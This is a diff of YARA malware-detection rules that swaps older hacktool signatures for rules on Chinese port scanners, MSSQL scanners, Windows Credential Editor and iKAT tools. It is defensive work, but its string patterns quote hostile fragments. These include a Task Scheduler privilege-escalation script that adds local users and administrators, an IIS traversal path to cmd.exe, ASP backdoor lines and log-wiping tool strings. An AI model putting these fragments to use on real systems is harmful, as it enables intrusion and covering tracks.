-		logic_hash = "89606ccf4341ba9451fd1bfbc818bbcd55d45d50e06f09b9f1ecd8efb3c322af"
-		score = 60
+		logic_hash = "30c380b6c683cbcbef7072e793d94e1782206b844fa23d334b737818f0a32f9f"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
-		$s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii
-		$s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii
-		$s5 = "Public Property Get oFS()" fullword ascii
+		$s0 = "Golden Fox" fullword wide
+		$s1 = "Syn Scan Port" fullword wide
+		$s2 = "CZ88.NET" fullword wide
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Cleaniislog
+rule SIGNATURE_BASE_CN_Hacktool_Scanport_Portscanner
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"
+		description = "Detects a chinese Portscanner named ScanPort"
 		author = "Florian Roth (Nextron Systems)"
-		id = "439726c6-3262-59ef-9a54-7dcd98cf924d"
-		date = "2014-11-23"
+		id = "a708283e-339c-599f-9321-3b063d0076a9"
+		date = "2014-12-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2370-L2391"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L630-L644"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
-		logic_hash = "77a26e57b36f73d4d2730bc3a4d8485718119e2ccc80b40de3515ec688616eb9"
-		score = 60
-		quality = 85
+		logic_hash = "fa2dce57cc3e9baecb80b0165dfeb1af1ba4c4b30098e3b1252eb98b4fc30f7f"
+		score = 70
+		quality = 60
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii
-		$s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii
-		$s8 = "CleanIISLog Ver" fullword ascii
-		$s9 = "msftpsvc" fullword ascii
-		$s10 = "Fatal Error: MFC initialization failed" fullword ascii
-		$s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii
-		$s12 = "Specified \".\" Will Clean All IP Record." fullword ascii
-		$s16 = "Service %s Stopped." fullword ascii
-		$s20 = "Process Log File %s..." fullword ascii
+		$s0 = "LScanPort" fullword wide
+		$s1 = "LScanPort Microsoft" fullword wide
+		$s2 = "www.yupsoft.com" fullword wide
 
 	condition:
-		5 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sqlcheck
+rule SIGNATURE_BASE_CN_Hacktool_S_EXE_Portscanner
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"
+		description = "Detects a chinese Portscanner named s.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a72d38ef-b2e7-5051-8538-724d9e95fa6a"
-		date = "2014-11-23"
+		id = "d6b35d4f-7e25-50dd-bef2-08f7033312e8"
+		date = "2014-12-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2393-L2410"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L646-L660"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"
-		logic_hash = "e9c1d7cabe7236e059f4bfec917ca00c47a3db955746ebfcda0f5e733de359c7"
-		score = 60
+		logic_hash = "658ae90f3af3c7abec6e692b6be350939ba7b654a9972d1a1016ff33e815a1de"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii
-		$s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii
-		$s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii
-		$s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii
-		$s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii
+		$s0 = "\\Result.txt" ascii
+		$s1 = "By:ZT QQ:376789051" fullword ascii
+		$s2 = "(http://www.eyuyan.com)" fullword wide
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Runasex
+rule SIGNATURE_BASE_CN_Hacktool_Milkt_BAT
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"
+		description = "Detects a chinese Portscanner named MilkT - shipped BAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5fe349db-c0fc-5a49-97ee-3142f4e0e4c1"
-		date = "2014-11-23"
+		id = "d680a5f1-6182-5bc8-99de-c3cba1a61903"
+		date = "2014-12-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2412-L2430"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L662-L675"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"
-		logic_hash = "dac03251539028da02c9f26f20ca751ee577c125fb4f287c61ac2ea6afb1bb28"
-		score = 60
+		logic_hash = "ad74c45db0ef52223eb4dd162a21c57074a4ecb869a841d836d14afc997a7478"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii
-		$s8 = "cmd.bat" fullword ascii
-		$s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii
-		$s11 = "%s Execute Succussifully." fullword ascii
-		$s12 = "winsta0" fullword ascii
-		$s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii
+		$s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
+		$s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
 
 	condition:
-		4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Nbtdump
+rule SIGNATURE_BASE_CN_Hacktool_Milkt_Scanner
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"
+		description = "Detects a chinese Portscanner named MilkT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fe490f72-a07d-57c2-b9bb-d791fab10ec6"
-		date = "2014-11-23"
+		id = "aa83c983-25c2-5051-88a1-fbc70d947d6e"
+		date = "2014-12-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2432-L2451"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L677-L695"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"
-		logic_hash = "fd17851820b5036b4cc1ebb6f927bb62c898027a17b5376e9420cbfa6a166ef2"
+		logic_hash = "707cbd625b5694b710d01622a053e60828da7f70b38e43012d04364137583fe9"
 		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Creation of results file - \"%s\" failed." fullword ascii
-		$s1 = "c:\\>nbtdump remote-machine" fullword ascii
-		$s7 = "Cerberus NBTDUMP" fullword ascii
-		$s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii
-		$s18 = "<P><H3>Account Information</H3><PRE>" fullword wide
-		$s19 = "%s's password is %s</H3>" fullword wide
-		$s20 = "%s's password is blank</H3>" fullword wide
+		$s0 = "Bf **************" ascii fullword
+		$s1 = "forming Time: %d/" ascii
+		$s2 = "KERNEL32.DLL" ascii fullword
+		$s3 = "CRTDLL.DLL" ascii fullword
+		$s4 = "WS2_32.DLL" ascii fullword
+		$s5 = "GetProcAddress" ascii fullword
+		$s6 = "atoi" ascii fullword
 
 	condition:
-		5 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Glass2K
+rule SIGNATURE_BASE_CN_Hacktool_1433_Scanner : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"
+		description = "Detects a chinese MSSQL scanner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7a2ad37a-6b55-5710-b07d-7c289cdbb04e"
-		date = "2014-11-23"
+		id = "77712d29-1a32-59e7-999a-a2ef02212886"
+		date = "2014-12-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2453-L2470"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L697-L714"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"
-		logic_hash = "d9b6b904028d67804d095f85caea5796f528f866191d3b4250055a75511f2090"
-		score = 60
+		logic_hash = "3e51e3596fc90bcea46236728da5437a9b6f56a42d64a651940321f575b32129"
+		score = 40
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii
-		$s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii
-		$s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii
-		$s4 = "Glass2k.exe" fullword wide
-		$s7 = "NeoLite Executable File Compressor" fullword ascii
+		$s0 = "1433" wide fullword
+		$s1 = "1433V" wide
+		$s2 = "del Weak1.txt" ascii fullword
+		$s3 = "del Attack.txt" ascii fullword
+		$s4 = "del /s /Q C:\\Windows\\system32\\doors\\" ascii
+		$s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of ( $s* )
 }
-rule SIGNATURE_BASE_Splitjoin_V1_3_3_Rar_Folder_3
+rule SIGNATURE_BASE_CN_Hacktool_1433_Scanner_Comp2 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
+		description = "Detects a chinese MSSQL scanner - component 2"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4ffd7501-339c-52b7-8661-2c3ca57dfa1f"
-		date = "2014-11-23"
+		id = "7d707be5-dad0-5d91-965b-908a8603b6c0"
+		date = "2014-12-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2472-L2487"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L716-L730"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "21409117b536664a913dcd159d6f4d8758f43435"
-		logic_hash = "79eb49413cd6919e4b91e916d2612e007fd2c4da7244d9e1e3dd04d46c461d8c"
-		score = 60
+		logic_hash = "7c84d59a821531d9e741a05a23a911bb1caa825a18bb6532381e5ff38193c260"
+		score = 40
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "ie686@sohu.com" fullword ascii
-		$s3 = "splitjoin.exe" fullword ascii
-		$s7 = "SplitJoin" fullword ascii
+		$s0 = "1433" wide fullword
+		$s1 = "1433V" wide
+		$s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of ( $s* )
 }
-rule SIGNATURE_BASE_Aspbackdoor_EDIT
+rule SIGNATURE_BASE_WCE_Modified_1_1014
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
+		description = "Modified (packed) version of Windows Credential Editor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cdcec370-97af-51c0-b81a-35a788f16ef4"
-		date = "2014-11-23"
+		id = "536d1a7f-bda1-5c22-bf72-a177468e7c42"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2489-L2508"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L732-L746"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"
-		logic_hash = "0f97c831eb9f257a2a6c9a677dde2ce17d529584fb7085bc94edd83d886e469f"
-		score = 60
+		hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"
+		logic_hash = "f094d635aabea9b9101fad3d0d23ad37692317ae5b4f636296ee612752c4421f"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii
-		$s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii
-		$s3 = "response.write \"<a href='index.asp'>" fullword ascii
-		$s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii
-		$s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii
-		$s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii
-		$s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii
+		$s0 = "LSASS.EXE" fullword ascii
+		$s1 = "_CREDS" ascii
+		$s9 = "Using WCE " ascii
 
 	condition:
-		5 of them
+		all of them
 }
-rule SIGNATURE_BASE_Aspbackdoor_Entice
+rule SIGNATURE_BASE_Ikat_Wmi_Rundll : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file entice.asp"
+		description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "68c61920-9c3c-5bfe-976c-346b258bb406"
-		date = "2014-11-23"
+		id = "e3d80c95-d333-53cf-8165-b3a1e66ed00d"
+		date = "2014-05-11"
 		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2510-L2527"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L767-L788"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"
-		logic_hash = "c11313351565d26d9b16a2d5c3c4589676593fe633c441a1c1a33b3c134a2d56"
-		score = 60
+		hash = "97c4d4e6a644eed5aa12437805e39213e494d120"
+		logic_hash = "b857e17c790a97468ae69c8cbec6474ee38bea25bb04520516a2603996d4bd41"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii
-		$s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii
-		$s4 = "conndb.Execute(sqllanguage)" fullword ascii
-		$s5 = "<!--#include file=sqlconn.asp-->" fullword ascii
-		$s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii
+		$s0 = "This operating system is not supported." fullword ascii
+		$s1 = "Error!" fullword ascii
+		$s2 = "Win32 only!" fullword ascii
+		$s3 = "COMCTL32.dll" fullword ascii
+		$s4 = "[LordPE]" ascii
+		$s5 = "CRTDLL.dll" fullword ascii
+		$s6 = "VBScript" fullword ascii
+		$s7 = "CoUninitialize" fullword ascii
 
 	condition:
-		all of them
+		all of them and filesize < 15KB
 }
-rule SIGNATURE_BASE_Fpipe2_0
+rule SIGNATURE_BASE_Ikat_Revelations
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"
+		description = "iKAT hack tool showing the content of password fields - file revelations.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7e104cf6-69d2-590e-8999-4f0d448719f2"
-		date = "2014-11-23"
+		id = "c5ef2c2a-c9c0-5c3a-bbcc-0b0949527850"
+		date = "2014-05-11"
 		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2529-L2547"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L790-L807"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "891609db7a6787575641154e7aab7757e74d837b"
-		logic_hash = "b28566315ddda7765dfee722f5ad02c1206c6916363d86407fdc61b53148f511"
-		score = 60
-		quality = 85
+		hash = "c4e217a8f2a2433297961561c5926cbd522f7996"
+		logic_hash = "0f3aa9e784beb7de8b560ecde8cc06d49e07f5e4ea4acb233ec9ac007179d7a3"
+		score = 75
+		quality = 60
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
-		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
-		$s2 = " -s    - outbound connection source port number" fullword ascii
-		$s3 = "source port for that outbound connection being set to 53 also." fullword ascii
-		$s4 = "http://www.foundstone.com" fullword ascii
-		$s19 = "FPipe" fullword ascii
+		$s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii
+		$s8 = "BETAsupport@snadboy.com" fullword wide
+		$s9 = "support@snadboy.com" fullword wide
+		$s14 = "RevelationHelper.dll" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Instgina
+rule SIGNATURE_BASE_Ikat_Priv_Esc_Tasksch
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file InstGina.exe"
+		description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."
 		author = "Florian Roth (Nextron Systems)"
-		id = "ccbda689-e61a-501d-a8ed-62e3c1c20289"
-		date = "2014-11-23"
+		id = "0786b313-3154-536b-b7eb-c4d8444a309f"
+		date = "2014-05-11"
 		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2549-L2564"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L809-L835"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5317fbc39508708534246ef4241e78da41a4f31c"
-		logic_hash = "a55a13ced122b9901f0505d585e7a7c984d4231b3507282c1b15ff400ce51265"
-		score = 60
+		hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"
+		logic_hash = "6d0f755a758aaac4328f5f4343b424c03c2751ddad6a1dbe7c0332171c027945"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "To Open Registry" fullword ascii
-		$s4 = "I love Candy very much!!" ascii
-		$s5 = "GinaDLL" fullword ascii
+		$s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii
+		$s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii
+		$s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii
+		$s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii
+		$s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii
+		$s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii
+		$s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii
+		$s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii
+		$s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii
+		$s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii
+		$s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii
+		$s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii
+		$s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Arttray_Zip_Folder_Arttray
+rule SIGNATURE_BASE_Ikat_Command_Lines_Agent
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"
+		description = "iKAT hack tools set agent - file ikat.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d29909a4-8663-54c7-8f0e-68b15def869f"
-		date = "2014-11-23"
+		id = "35068d59-272d-55a6-b211-2c138276914c"
+		date = "2014-05-11"
 		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2566-L2582"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L837-L858"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"
-		logic_hash = "225be71bfd047331399162941edf06c72d2fd1afa04c78cbc51099665f50883b"
-		score = 60
-		quality = 85
+		hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"
+		logic_hash = "a39f8e388aa11c732156753f4a19aa9cc3ccd0437de30cdcc608926320a089b0"
+		score = 75
+		quality = 60
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "http://www.brigsoft.com" fullword wide
-		$s2 = "ArtTrayHookDll.dll" fullword ascii
-		$s3 = "ArtTray Version 1.0 " fullword wide
-		$s16 = "TRM_HOOKCALLBACK" fullword ascii
+		$s0 = "Extended Module: super mario brothers" fullword ascii
+		$s1 = "Extended Module: " fullword ascii
+		$s3 = "ofpurenostalgicfeeling" fullword ascii
+		$s8 = "-supermariobrotheretic" fullword ascii
+		$s9 = "!http://132.147.96.202:80" fullword ascii
+		$s12 = "iKAT Exe Template" fullword ascii
+		$s15 = "withadancyflavour.." fullword ascii
+		$s16 = "FastTracker v2.00   " fullword ascii
 
 	condition:
-		all of them
+		4 of them
 }
-rule SIGNATURE_BASE_Sig_238_Findoor
+rule SIGNATURE_BASE_Ikat_Cmd_As_Dll
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file findoor.exe"
+		description = "iKAT toolset file cmd.dll ReactOS file cloaked"
 		author = "Florian Roth (Nextron Systems)"
-		id = "61215a76-8c29-505d-bfef-a5f13fec476c"
-		date = "2014-11-23"
+		id = "8d15b4b6-25f3-556c-bfa8-eba503c9c649"
+		date = "2014-05-11"
 		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2584-L2601"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L860-L878"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"
-		logic_hash = "223f324ab6b61775d500dc248b9db8363ce915ec279a893a6f0ec92b273a27c0"
-		score = 60
+		hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"
+		logic_hash = "3f8390fb6eb16749e63379222a5899b811e7ccd6b3b219b60d7a621fd4595e7b"
+		score = 65
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii
-		$s8 = "PASS hacker@hacker.com" fullword ascii
-		$s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii
-		$s10 = "MAIL FROM:hacker@hacker.com" fullword ascii
-		$s11 = "http://isno.yeah.net" fullword ascii
+		$s1 = "cmd.exe" fullword wide
+		$s2 = "ReactOS Development Team" fullword wide
+		$s3 = "ReactOS Command Processor" fullword wide
+		$ext = "extension: .dll" nocase
 
 	condition:
-		4 of them
+		all of ( $s* ) and $ext
 }
-rule SIGNATURE_BASE_Aspbackdoor_Ipclear
+rule SIGNATURE_BASE_Ikat_Tools_Nmap
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
+		description = "Generic rule for NMAP - based on NMAP 4 standalone"
 		author = "Florian Roth (Nextron Systems)"
-		id = "71ebecea-721f-5c5d-9997-6a57f070d91c"
-		date = "2014-11-23"
+		id = "be4858e6-a8f3-55eb-9c04-f4def838dde1"
+		date = "2014-05-11"
 		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2603-L2620"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L880-L897"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"
-		logic_hash = "49fbe844a99aa8cae25db90e1d8cdeee13c81293bba7b3201afc4748cb0a6a7c"
-		score = 60
-		quality = 85
+		hash = "d0543f365df61e6ebb5e345943577cc40fca8682"
+		logic_hash = "f538d807ed4904a2c321385a095a97bc0d718349f7eb31a367e521228412cef2"
+		score = 50
+		quality = 83
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii
-		$s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii
-		$s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii
-		$s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii
-		$s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$s0 = "Insecure.Org" fullword wide
+		$s1 = "Copyright (c) Insecure.Com" fullword wide
+		$s2 = "nmap" fullword nocase
+		$s3 = "Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm)." ascii
 
 	condition:
 		all of them
 }
